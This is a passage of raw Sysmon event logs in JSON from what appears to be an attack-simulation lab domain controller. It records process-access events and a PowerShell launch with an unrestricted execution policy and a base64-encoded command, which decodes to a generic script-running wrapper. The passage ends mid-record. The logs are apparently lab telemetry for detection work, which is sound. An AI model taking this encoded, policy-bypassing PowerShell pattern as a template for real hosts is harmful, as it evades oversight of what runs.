\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4734,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.645\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010B3720600}\r\nTargetProcessId: 4480\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.645","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010B3720600}","TargetProcessId":"4480","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4735,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.661\r\nProcessGuid: {E2A3D6B1-11BF-5F25-0000-0010B3720600}\r\nProcessId: 4480\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ratzkzff.u10.ps1\r\nCreationUtcTime: 2020-08-01 06:54:55.661","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.661","ProcessGuid":"{E2A3D6B1-11BF-5F25-0000-0010B3720600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ratzkzff.u10.ps1","CreationUtcTime":"2020-08-01 06:54:55.661","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4736,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.692\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010B3720600}\r\nTargetProcessId: 4480\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.692","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010B3720600}","TargetProcessId":"4480","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4737,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.692\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010B3720600}\r\nTargetProcessId: 4480\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.692","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010B3720600}","TargetProcessId":"4480","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4738,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.756\r\nProcessGuid: {E2A3D6B1-11BF-5F25-0000-0010A17E0600}\r\nProcessId: 1576\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11BF-5F25-0000-0020E96E0600}\r\nLogonId: 0x66EE9\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-11BF-5F25-0000-0010B3720600}\r\nParentProcessId: 4480\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.756","ProcessGuid":"{E2A3D6B1-11BF-5F25-0000-0010A17E0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11BF-5F25-0000-0020E96E0600}","LogonId":"0x66ee9","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-11BF-5F25-0000-0010B3720600}","ParentProcessId":"4480","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBH